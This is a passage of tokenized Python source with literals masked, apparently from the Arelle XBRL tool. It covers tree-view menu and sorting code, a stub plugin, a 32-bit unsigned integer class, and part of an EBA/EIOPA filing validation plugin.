tearoff = <NUM_LIT:0> ) <EOL> self . menu . add_cascade ( label = menulabel , menu = nameStyleMenu , underline = <NUM_LIT:0> ) <EOL> from arelle . ModelRelationshipSet import labelroles <EOL> nameStyleMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = lambda a = True : self . setNamestyle ( a ) ) <EOL> nameStyleMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = lambda a = False : self . setNamestyle ( a ) ) <EOL> except Exception as ex : <EOL> self . modelXbrl . info ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = self . modelXbrl . modelDocument , title = self . tabTitle , error = str ( ex ) ) <EOL> self . menu = None <EOL> def menuAddUnitDisplay ( self ) : <EOL> if self . menu : <EOL> try : <EOL> rolesMenu = Menu ( self . viewFrame , tearoff = <NUM_LIT:0> ) <EOL> self . menu . 
add_cascade ( label = _ ( "<STR_LIT>" ) , menu = rolesMenu , underline = <NUM_LIT:0> ) <EOL> rolesMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = lambda : self . setUnitDisplay ( unitDisplayID = True ) ) <EOL> rolesMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = lambda : self . setUnitDisplay ( unitDisplayID = False ) ) <EOL> except Exception as ex : <EOL> self . modelXbrl . info ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = self . modelXbrl . modelDocument , title = self . tabTitle , error = str ( ex ) ) <EOL> self . menu = None <EOL> def menuAddViews ( self , addClose = True , tabWin = None ) : <EOL> if self . menu : <EOL> try : <EOL> if tabWin is None : tabWin = self . tabWin <EOL> viewMenu = Menu ( self . viewFrame , tearoff = <NUM_LIT:0> ) <EOL> self . menu . add_cascade ( label = _ ( "<STR_LIT>" ) , menu = viewMenu , underline = <NUM_LIT:0> ) <EOL> newViewsMenu = Menu ( self . viewFrame , tearoff = <NUM_LIT:0> ) <EOL> if addClose : <EOL> viewMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = self . close ) <EOL> viewMenu . add_cascade ( label = _ ( "<STR_LIT>" ) , menu = newViewsMenu , underline = <NUM_LIT:0> ) <EOL> newViewsMenu . add_command ( label = _ ( "<STR_LIT>" ) , underline = <NUM_LIT:0> , command = lambda : self . newArcroleGroupView ( tabWin ) ) <EOL> from arelle . ModelRelationshipSet import baseSetArcroles <EOL> for x in baseSetArcroles ( self . modelXbrl ) + [ ( "<STR_LIT>" , "<STR_LIT>" ) , ( "<STR_LIT>" , "<STR_LIT>" ) ] : <EOL> newViewsMenu . add_command ( label = x [ <NUM_LIT:0> ] [ <NUM_LIT:1> : ] , underline = <NUM_LIT:0> , command = lambda a = x [ <NUM_LIT:1> ] : self . newView ( a , tabWin ) ) <EOL> except Exception as ex : <EOL> self . modelXbrl . info ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = self . modelXbrl . modelDocument , title = self . tabTitle , error = str ( ex ) ) <EOL> self . 
menu = None <EOL> def newView ( self , arcrole , tabWin ) : <EOL> if arcrole in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> from arelle import ViewWinRoleTypes <EOL> ViewWinRoleTypes . viewRoleTypes ( self . modelXbrl , tabWin , arcrole == "<STR_LIT>" , lang = self . lang ) <EOL> else : <EOL> from arelle import ViewWinRelationshipSet <EOL> ViewWinRelationshipSet . viewRelationshipSet ( self . modelXbrl , tabWin , arcrole , lang = self . lang ) <EOL> def newArcroleGroupView ( self , tabWin ) : <EOL> from arelle . DialogArcroleGroup import getArcroleGroup <EOL> from arelle import ViewWinRelationshipSet <EOL> arcroleGroup = getArcroleGroup ( self . modelXbrl . modelManager . cntlr , self . modelXbrl ) <EOL> if arcroleGroup : <EOL> ViewWinRelationshipSet . viewRelationshipSet ( self . modelXbrl , tabWin , arcroleGroup , lang = self . lang ) <EOL> def setLang ( self , lang ) : <EOL> self . lang = lang <EOL> self . view ( ) <EOL> def setLabelrole ( self , labelrole ) : <EOL> self . labelrole = labelrole <EOL> self . view ( ) <EOL> def setNamestyle ( self , isPrefixed ) : <EOL> self . nameIsPrefixed = isPrefixed <EOL> self . view ( ) <EOL> def setUnitDisplay ( self , unitDisplayID = False ) : <EOL> self . unitDisplayID = unitDisplayID <EOL> self . view ( ) <EOL> def setColumnsSortable ( self , treeColIsInt = False , startUnsorted = False , initialSortCol = "<STR_LIT>" , initialSortDirForward = True ) : <EOL> if hasattr ( self , '<STR_LIT>' ) and self . lastSortColumn : <EOL> self . treeView . heading ( self . lastSortColumn , image = self . sortImages [ <NUM_LIT:2> ] ) <EOL> self . lastSortColumn = None if startUnsorted else initialSortCol <EOL> self . lastSortColumnForward = initialSortDirForward <EOL> self . treeColIsInt = treeColIsInt <EOL> if not hasattr ( self , "<STR_LIT>" ) : <EOL> self . sortImages = ( PhotoImage ( file = os . path . join ( self . modelXbrl . modelManager . cntlr . imagesDir , "<STR_LIT>" ) ) , <EOL> PhotoImage ( file = os . path . join ( self . 
modelXbrl . modelManager . cntlr . imagesDir , "<STR_LIT>" ) ) , <EOL> PhotoImage ( ) ) <EOL> for col in ( "<STR_LIT>" , ) + self . treeView [ "<STR_LIT>" ] : <EOL> self . treeView . heading ( col , command = lambda c = col : self . sortColumn ( c ) ) <EOL> if not startUnsorted : <EOL> self . treeView . heading ( initialSortCol , image = self . sortImages [ not initialSortDirForward ] ) <EOL> def colSortVal ( self , node , col ) : <EOL> if col == "<STR_LIT>" : <EOL> treeColVal = self . treeView . item ( node ) [ "<STR_LIT:text>" ] <EOL> if self . treeColIsInt : <EOL> return int ( treeColVal ) <EOL> else : <EOL> treeColVal = self . treeView . set ( node , col ) <EOL> if col == "<STR_LIT>" : <EOL> try : <EOL> return int ( treeColVal ) <EOL> except : <EOL> return <NUM_LIT:0> <EOL> return treeColVal <EOL> def sortNestedRows ( self , parentNode , col , reverse ) : <EOL> l = [ ( self . colSortVal ( node , col ) , node ) for node in self . treeView . get_children ( parentNode ) ] <EOL> l . sort ( reverse = reverse ) <EOL> for i , ( cell , node ) in enumerate ( l ) : <EOL> self . treeView . move ( node , parentNode , i ) <EOL> for i , node in enumerate ( self . treeView . get_children ( parentNode ) ) : <EOL> self . treeView . item ( node , tags = ( '<STR_LIT>' if i & <NUM_LIT:1> else '<STR_LIT>' , ) ) <EOL> self . sortNestedRows ( node , col , reverse ) <EOL> def sortColumn ( self , col ) : <EOL> if col == self . lastSortColumn : <EOL> reverse = self . lastSortColumnForward <EOL> self . lastSortColumnForward = not reverse <EOL> else : <EOL> if self . lastSortColumn : <EOL> self . treeView . heading ( self . lastSortColumn , image = self . sortImages [ <NUM_LIT:2> ] ) <EOL> reverse = False <EOL> self . lastSortColumnForward = True <EOL> self . lastSortColumn = col <EOL> self . treeView . heading ( col , image = self . sortImages [ reverse ] ) <EOL> self . sortNestedRows ( '<STR_LIT>' , col , reverse ) <EOL> self . 
viewSelectionChange ( ) <EOL> def copyCellToClipboard ( self , * ignore ) : <EOL> self . modelXbrl . modelManager . cntlr . clipboardData ( <EOL> text = self . treeView . item ( self . menuRow ) [ '<STR_LIT:text>' ] if self . menuCol == '<STR_LIT>' else self . treeView . set ( self . menuRow , self . menuCol ) ) <EOL> def copyRowToClipboard ( self , * ignore ) : <EOL> self . modelXbrl . modelManager . cntlr . clipboardData ( <EOL> text = '<STR_LIT:\t>' . join ( [ self . treeView . item ( self . menuRow ) [ '<STR_LIT:text>' ] ] + <EOL> [ self . treeView . set ( self . menuRow , c ) for c in self . treeView [ '<STR_LIT>' ] ] ) ) <EOL> def copyTableToClipboard ( self , * ignore ) : <EOL> cols = self . treeView [ '<STR_LIT>' ] <EOL> lines = [ '<STR_LIT:\t>' . join ( [ self . treeView . heading ( '<STR_LIT>' ) [ '<STR_LIT:text>' ] ] + <EOL> [ self . treeView . heading ( h ) [ '<STR_LIT:text>' ] for h in cols ] ) ] <EOL> self . tabLines ( '<STR_LIT>' , '<STR_LIT>' , cols , lines ) <EOL> self . modelXbrl . modelManager . cntlr . clipboardData ( text = '<STR_LIT:\n>' . join ( lines ) ) <EOL> def tabLines ( self , parentNode , indent , cols , lines ) : <EOL> for node in self . treeView . get_children ( parentNode ) : <EOL> lines . append ( '<STR_LIT:\t>' . join ( [ indent + self . treeView . item ( node ) [ '<STR_LIT:text>' ] ] + <EOL> [ self . treeView . set ( node , c ) for c in cols ] ) ) <EOL> self . tabLines ( node , indent + '<STR_LIT:U+0020>' , cols , lines ) </s>
<s> '''<STR_LIT>''' <EOL> def foo ( ) : <EOL> print ( "<STR_LIT>" ) <EOL> __pluginInfo__ = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:version>' : '<STR_LIT>' , <EOL> '<STR_LIT:description>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : foo , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> } </s>
<s> C = <NUM_LIT> <EOL> def norm ( n ) : <EOL> return n & <NUM_LIT> <EOL> class U32 : <EOL> v = <NUM_LIT:0> <EOL> def __init__ ( self , value = <NUM_LIT:0> ) : <EOL> self . v = C + norm ( abs ( int ( value ) ) ) <EOL> def set ( self , value = <NUM_LIT:0> ) : <EOL> self . v = C + norm ( abs ( int ( value ) ) ) <EOL> def __repr__ ( self ) : <EOL> return hex ( norm ( self . v ) ) <EOL> def __long__ ( self ) : return int ( norm ( self . v ) ) <EOL> def __int__ ( self ) : return int ( norm ( self . v ) ) <EOL> def __chr__ ( self ) : return chr ( norm ( self . v ) ) <EOL> def __add__ ( self , b ) : <EOL> r = U32 ( ) <EOL> r . v = C + norm ( self . v + b . v ) <EOL> return r <EOL> def __sub__ ( self , b ) : <EOL> r = U32 ( ) <EOL> if self . v < b . v : <EOL> r . v = C + norm ( <NUM_LIT> - ( b . v - self . v ) ) <EOL> else : r . v = C + norm ( self . v - b . v ) <EOL> return r <EOL> def __mul__ ( self , b ) : <EOL> r = U32 ( ) <EOL> r . v = C + norm ( self . v * b . v ) <EOL> return r <EOL> def __div__ ( self , b ) : <EOL> r = U32 ( ) <EOL> r . v = C + ( norm ( self . v ) / norm ( b . v ) ) <EOL> return r <EOL> def __mod__ ( self , b ) : <EOL> r = U32 ( ) <EOL> r . v = C + ( norm ( self . v ) % norm ( b . v ) ) <EOL> return r <EOL> def __neg__ ( self ) : return U32 ( self . v ) <EOL> def __pos__ ( self ) : return U32 ( self . v ) <EOL> def __abs__ ( self ) : return U32 ( self . v ) <EOL> def __invert__ ( self ) : <EOL> r = U32 ( ) <EOL> r . v = C + norm ( ~ self . v ) <EOL> return r <EOL> def __lshift__ ( self , b ) : <EOL> r = U32 ( ) <EOL> r . v = C + norm ( self . v << b ) <EOL> return r <EOL> def __rshift__ ( self , b ) : <EOL> r = U32 ( ) <EOL> r . v = C + ( norm ( self . v ) >> b ) <EOL> return r <EOL> def __and__ ( self , b ) : <EOL> r = U32 ( ) <EOL> r . v = C + norm ( self . v & b . v ) <EOL> return r <EOL> def __or__ ( self , b ) : <EOL> r = U32 ( ) <EOL> r . v = C + norm ( self . v | b . 
v ) <EOL> return r <EOL> def __xor__ ( self , b ) : <EOL> r = U32 ( ) <EOL> r . v = C + norm ( self . v ^ b . v ) <EOL> return r <EOL> def __not__ ( self ) : <EOL> return U32 ( not norm ( self . v ) ) <EOL> def truth ( self ) : <EOL> return norm ( self . v ) <EOL> def __cmp__ ( self , b ) : <EOL> if norm ( self . v ) > norm ( b . v ) : return <NUM_LIT:1> <EOL> elif norm ( self . v ) < norm ( b . v ) : return - <NUM_LIT:1> <EOL> else : return <NUM_LIT:0> <EOL> def __bool__ ( self ) : <EOL> return norm ( self . v ) </s>
<s> '''<STR_LIT>''' <EOL> import os , sys , re <EOL> from arelle import PluginManager <EOL> from arelle import ModelDocument , XbrlConst , XmlUtil , UrlUtil , LeiUtil <EOL> from arelle . HashUtil import md5hash , Md5Sum <EOL> from arelle . ModelDtsObject import ModelConcept , ModelType , ModelLocator , ModelResource <EOL> from arelle . ModelFormulaObject import Aspect <EOL> from arelle . ModelObject import ModelObject <EOL> from arelle . ModelRelationshipSet import ModelRelationshipSet <EOL> from arelle . ModelValue import qname , qnameEltPfxName <EOL> from arelle . ValidateUtr import ValidateUtr <EOL> from arelle . XbrlConst import qnEnumerationItemType <EOL> try : <EOL> import regex as re <EOL> except ImportError : <EOL> import re <EOL> from lxml import etree <EOL> from collections import defaultdict <EOL> qnFIndicators = qname ( "<STR_LIT>" ) <EOL> qnFilingIndicator = qname ( "<STR_LIT>" ) <EOL> qnPercentItemType = qname ( "<STR_LIT>" ) <EOL> qnPureItemType = qname ( "<STR_LIT>" ) <EOL> qnMetReportingCurrency = qname ( "<STR_LIT>" ) <EOL> integerItemTypes = { "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" } <EOL> schemaRefDatePattern = re . 
compile ( r"<STR_LIT>" ) <EOL> s_2_18_c_a_met = { <EOL> """<STR_LIT>""" <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" } <EOL> CANONICAL_PREFIXES = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } <EOL> def dislosureSystemTypes ( disclosureSystem , * args , ** kwargs ) : <EOL> return ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> def disclosureSystemConfigURL ( disclosureSystem , * args , ** kwargs ) : <EOL> return os . path . join ( os . path . dirname ( __file__ ) , "<STR_LIT>" ) <EOL> def validateSetup ( val , parameters = None , * args , ** kwargs ) : <EOL> val . validateEBA = val . validateDisclosureSystem and getattr ( val . disclosureSystem , "<STR_LIT>" , False ) <EOL> val . validateEIOPA = val . validateDisclosureSystem and getattr ( val . disclosureSystem , "<STR_LIT>" , False ) <EOL> if not ( val . validateEBA or val . validateEIOPA ) : <EOL> return <EOL> val . validateUTR = False <EOL> val . utrValidator = ValidateUtr ( val . modelXbrl , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> val . isEIOPAfullVersion = val . isEIOPA_2_0_1 = False <EOL> modelDocument = val . modelXbrl . modelDocument <EOL> if modelDocument . type == ModelDocument . Type . INSTANCE : <EOL> for doc , docRef in modelDocument . referencesDocument . items ( ) : <EOL> if docRef . referenceType == "<STR_LIT>" : <EOL> if docRef . referringModelObject . localName == "<STR_LIT>" : <EOL> _match = schemaRefDatePattern . match ( doc . uri ) <EOL> if _match : <EOL> val . isEIOPAfullVersion = _match . group ( <NUM_LIT:1> ) > "<STR_LIT>" <EOL> val . isEIOPA_2_0_1 = _match . group ( <NUM_LIT:1> ) >= "<STR_LIT>" <EOL> break <EOL> else : <EOL> val . modelXbrl . 
error ( "<STR_LIT>" , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = modelDocument , schemaRef = doc . uri ) <EOL> val . qnDimAF = val . qnDimOC = val . qnCAx1 = None <EOL> _nsmap = val . modelXbrl . modelDocument . xmlRootElement . nsmap <EOL> if val . isEIOPA_2_0_1 : <EOL> _hasPiInstanceGenerator = False <EOL> for pi in modelDocument . processingInstructions : <EOL> if pi . target == "<STR_LIT>" : <EOL> _hasPiInstanceGenerator = True <EOL> if not all ( pi . get ( attr ) for attr in ( "<STR_LIT:id>" , "<STR_LIT:version>" , "<STR_LIT>" ) ) : <EOL> val . modelXbrl . warning ( "<STR_LIT>" , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = modelDocument ) <EOL> if not _hasPiInstanceGenerator : <EOL> val . modelXbrl . warning ( "<STR_LIT>" , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = modelDocument ) <EOL> val . qnDimAF = qname ( "<STR_LIT>" , _nsmap ) <EOL> val . qnDimOC = qname ( "<STR_LIT>" , _nsmap ) <EOL> val . qnCAx1 = qname ( "<STR_LIT>" , _nsmap ) <EOL> val . prefixNamespace = { } <EOL> val . namespacePrefix = { } <EOL> val . idObjects = { } <EOL> val . typedDomainQnames = set ( ) <EOL> val . typedDomainElements = set ( ) <EOL> for modelConcept in val . modelXbrl . qnameConcepts . values ( ) : <EOL> if modelConcept . isTypedDimension : <EOL> typedDomainElement = modelConcept . typedDomainElement <EOL> if isinstance ( typedDomainElement , ModelConcept ) : <EOL> val . typedDomainQnames . add ( typedDomainElement . qname ) <EOL> val . typedDomainElements . add ( typedDomainElement ) <EOL> val . filingIndicators = { } <EOL> val . numFilingIndicatorTuples = <NUM_LIT:0> <EOL> val . cntxEntities = set ( ) <EOL> val . cntxDates = defaultdict ( set ) <EOL> val . unusedCntxIDs = set ( ) <EOL> val . unusedUnitIDs = set ( ) <EOL> val . currenciesUsed = { } <EOL> val . reportingCurrency = None <EOL> val . namespacePrefixesUsed = defaultdict ( set ) <EOL> val . prefixesUnused = set ( ) <EOL> for prefix , ns in _nsmap . items ( ) : <EOL> val . prefixesUnused . 
add ( prefix ) <EOL> val . namespacePrefixesUsed [ ns ] . add ( prefix ) <EOL> val . firstFactObjectIndex = sys . maxsize <EOL> val . firstFact = None <EOL> val . footnotesRelationshipSet = ModelRelationshipSet ( val . modelXbrl , "<STR_LIT>" ) <EOL> def prefixUsed ( val , ns , prefix ) : <EOL> val . namespacePrefixesUsed [ ns ] . add ( prefix ) <EOL> for _prefix in val . namespacePrefixesUsed [ ns ] : <EOL> val . prefixesUnused . discard ( _prefix ) <EOL> def validateStreamingFacts ( val , factsToCheck , * args , ** kwargs ) : <EOL> if not ( val . validateEBA or val . validateEIOPA ) : <EOL> return True <EOL> validateFacts ( val , factsToCheck ) <EOL> def validateFacts ( val , factsToCheck ) : <EOL> modelXbrl = val . modelXbrl <EOL> modelDocument = modelXbrl . modelDocument <EOL> timelessDatePattern = re . compile ( r"<STR_LIT>" ) <EOL> for cntx in modelXbrl . contexts . values ( ) : <EOL> if getattr ( cntx , "<STR_LIT>" , False ) : <EOL> continue <EOL> cntx . _batchChecked = True <EOL> val . cntxEntities . add ( cntx . entityIdentifier ) <EOL> dateElts = XmlUtil . descendants ( cntx , XbrlConst . xbrli , ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> if any ( not timelessDatePattern . match ( e . textValue ) for e in dateElts ) : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = cntx , dates = "<STR_LIT:U+002CU+0020>" . join ( e . text for e in dateElts ) ) <EOL> if cntx . isForeverPeriod : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = cntx ) <EOL> elif cntx . isStartEndPeriod : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = cntx ) <EOL> elif cntx . isInstantPeriod : <EOL> val . cntxDates [ cntx . instantDatetime ] . add ( modelXbrl if getattr ( val . modelXbrl , "<STR_LIT>" , False ) <EOL> else cntx ) <EOL> if cntx . hasSegment : <EOL> modelXbrl . 
error ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = cntx , cntx = cntx . id ) <EOL> if cntx . nonDimValues ( "<STR_LIT>" ) : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" if val . isEIOPAfullVersion else "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = cntx , cntx = cntx . id , <EOL> messageCodes = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> val . unusedCntxIDs . add ( cntx . id ) <EOL> if val . isEIOPA_2_0_1 and len ( cntx . id ) > <NUM_LIT> : <EOL> modelXbrl . warning ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = cntx , cntx = cntx . id ) <EOL> for unit in modelXbrl . units . values ( ) : <EOL> if getattr ( unit , "<STR_LIT>" , False ) : <EOL> continue <EOL> unit . _batchChecked = True <EOL> val . unusedUnitIDs . add ( unit . id ) <EOL> factsByQname = defaultdict ( set ) <EOL> for f in factsToCheck : <EOL> factsByQname [ f . qname ] . add ( f ) <EOL> val . unusedCntxIDs . discard ( f . contextID ) <EOL> val . unusedUnitIDs . discard ( f . unitID ) <EOL> if f . objectIndex < val . firstFactObjectIndex : <EOL> val . firstFactObjectIndex = f . objectIndex <EOL> val . firstFact = f <EOL> for fIndicators in factsByQname [ qnFIndicators ] : <EOL> val . numFilingIndicatorTuples += <NUM_LIT:1> <EOL> for fIndicator in fIndicators . modelTupleFacts : <EOL> _value = ( getattr ( fIndicator , "<STR_LIT>" , None ) or fIndicator . value ) <EOL> _filed = fIndicator . get ( "<STR_LIT>" , "<STR_LIT:true>" ) in ( "<STR_LIT:true>" , "<STR_LIT:1>" ) <EOL> if _value in val . filingIndicators : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = ( fIndicator , val . filingIndicators [ _value ] ) , filingIndicator = _value ) <EOL> if _filed and not val . filingIndicators [ _value ] : <EOL> val . filingIndicators [ _value ] = _filed <EOL> else : <EOL> val . filingIndicators [ _value ] = _filed <EOL> val . unusedCntxIDs . discard ( fIndicator . 
contextID ) <EOL> cntx = fIndicator . context <EOL> if cntx is not None and ( cntx . hasSegment or cntx . hasScenario ) : <EOL> modelXbrl . error ( "<STR_LIT>" if val . isEIOPAfullVersion else "<STR_LIT>" , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = fIndicator , filingIndicator = _value ) <EOL> if fIndicators . objectIndex > val . firstFactObjectIndex : <EOL> modelXbrl . warning ( "<STR_LIT>" , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = ( fIndicators , val . firstFact ) , firstFact = val . firstFact . qname ) <EOL> if val . isEIOPAfullVersion : <EOL> for fIndicator in factsByQname [ qnFilingIndicator ] : <EOL> if fIndicator . getparent ( ) . qname == XbrlConst . qnXbrliXbrl : <EOL> _isPos = fIndicator . get ( "<STR_LIT>" , "<STR_LIT:true>" ) in ( "<STR_LIT:true>" , "<STR_LIT:1>" ) <EOL> _value = ( getattr ( fIndicator , "<STR_LIT>" , None ) or fIndicator . value ) <EOL> modelXbrl . error ( "<STR_LIT>" if _isPos else "<STR_LIT>" , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = fIndicator , filingIndicator = _value , <EOL> messageCodes = ( "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> otherFacts = { } <EOL> nilFacts = [ ] <EOL> stringFactsWithXmlLang = [ ] <EOL> nonMonetaryNonPureFacts = [ ] <EOL> for qname , facts in factsByQname . items ( ) : <EOL> for f in facts : <EOL> if f . qname == qnFilingIndicator : <EOL> continue <EOL> if modelXbrl . skipDTS : <EOL> c = f . qname . localName [ <NUM_LIT:0> ] <EOL> isNumeric = c in ( '<STR_LIT:m>' , '<STR_LIT:p>' , '<STR_LIT:r>' , '<STR_LIT:i>' ) <EOL> isMonetary = c == '<STR_LIT:m>' <EOL> isInteger = c == '<STR_LIT:i>' <EOL> isPercent = c == '<STR_LIT:p>' <EOL> isString = c == '<STR_LIT:s>' <EOL> isEnum = c == '<STR_LIT:e>' <EOL> else : <EOL> concept = f . concept <EOL> if concept is not None : <EOL> isNumeric = concept . isNumeric <EOL> isMonetary = concept . isMonetary <EOL> isInteger = concept . baseXbrliType in integerItemTypes <EOL> isPercent = concept . 
typeQname in ( qnPercentItemType , qnPureItemType ) <EOL> isString = concept . baseXbrliType in ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> isEnum = concept . typeQname == qnEnumerationItemType <EOL> else : <EOL> isNumeric = isString = isEnum = False <EOL> k = ( f . getparent ( ) . objectIndex , <EOL> f . qname , <EOL> f . context . contextDimAwareHash if f . context is not None else None , <EOL> f . unit . hash if f . unit is not None else None , <EOL> hash ( f . xmlLang ) ) <EOL> if f . qname == qnFIndicators and val . validateEIOPA : <EOL> pass <EOL> elif k not in otherFacts : <EOL> otherFacts [ k ] = { f } <EOL> else : <EOL> matches = [ o <EOL> for o in otherFacts [ k ] <EOL> if ( f . getparent ( ) . objectIndex == o . getparent ( ) . objectIndex and <EOL> f . qname == o . qname and <EOL> f . context . isEqualTo ( o . context ) if f . context is not None and o . context is not None else True ) and <EOL> ( f . xmlLang == o . xmlLang ) ] <EOL> if matches : <EOL> contexts = [ f . contextID ] + [ o . contextID for o in matches ] <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" if val . isEIOPAfullVersion else "<STR_LIT>" ) , <EOL> _ ( '<STR_LIT>' ) , <EOL> modelObject = [ f ] + matches , fact = f . qname , contexts = '<STR_LIT:U+002CU+0020>' . join ( contexts ) , <EOL> messageCodes = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> else : <EOL> otherFacts [ k ] . add ( f ) <EOL> if isNumeric : <EOL> if f . precision : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = f , fact = f . qname , contextID = f . contextID , precision = f . precision ) <EOL> if f . decimals and not f . isNil : <EOL> if f . decimals == "<STR_LIT>" : <EOL> if not val . isEIOPAfullVersion : <EOL> modelXbrl . error ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = f , fact = f . qname , contextID = f . contextID , decimals = f . decimals ) <EOL> else : <EOL> try : <EOL> xValue = f . xValue <EOL> dec = int ( f . 
decimals ) <EOL> if isMonetary : <EOL> if val . isEIOPA_2_0_1 : <EOL> _absXvalue = abs ( xValue ) <EOL> if str ( f . qname ) in s_2_18_c_a_met : <EOL> dMin = <NUM_LIT:2> <EOL> elif _absXvalue >= <NUM_LIT> : <EOL> dMin = - <NUM_LIT:4> <EOL> elif <NUM_LIT> > _absXvalue >= <NUM_LIT> : <EOL> dMin = - <NUM_LIT:3> <EOL> elif <NUM_LIT> > _absXvalue >= <NUM_LIT:1000> : <EOL> dMin = - <NUM_LIT:2> <EOL> else : <EOL> dMin = - <NUM_LIT:1> <EOL> if dMin > dec : <EOL> modelXbrl . error ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = f , fact = f . qname , contextID = f . contextID , minimumDecimals = dMin , decimals = f . decimals ) <EOL> elif dec < - <NUM_LIT:3> : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = f , fact = f . qname , contextID = f . contextID , decimals = f . decimals ) <EOL> else : <EOL> if - <NUM_LIT> < xValue < <NUM_LIT> : dMin = <NUM_LIT:2> <EOL> elif - <NUM_LIT:1> < xValue < <NUM_LIT:1> : dMin = <NUM_LIT:1> <EOL> elif - <NUM_LIT:10> < xValue < <NUM_LIT:10> : dMin = <NUM_LIT:0> <EOL> elif - <NUM_LIT:100> < xValue < <NUM_LIT:100> : dMin = - <NUM_LIT:1> <EOL> elif - <NUM_LIT:1000> < xValue < <NUM_LIT:1000> : dMin = - <NUM_LIT:2> <EOL> else : dMin = - <NUM_LIT:3> <EOL> if dMin > dec : <EOL> modelXbrl . warning ( "<STR_LIT>" , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = f , fact = f . qname , contextID = f . contextID , value = xValue , decimals = f . decimals , mindec = dMin ) <EOL> elif isInteger : <EOL> if dec != <NUM_LIT:0> : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = f , fact = f . qname , contextID = f . contextID , decimals = f . decimals ) <EOL> elif isPercent : <EOL> if dec < <NUM_LIT:4> : <EOL> modelXbrl . error ( ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> _ ( "<STR_LIT>" ) , <EOL> modelObject = f , fact = f . qname , contextID = f . contextID , decimals = f . decimals ) <EOL> if val . 
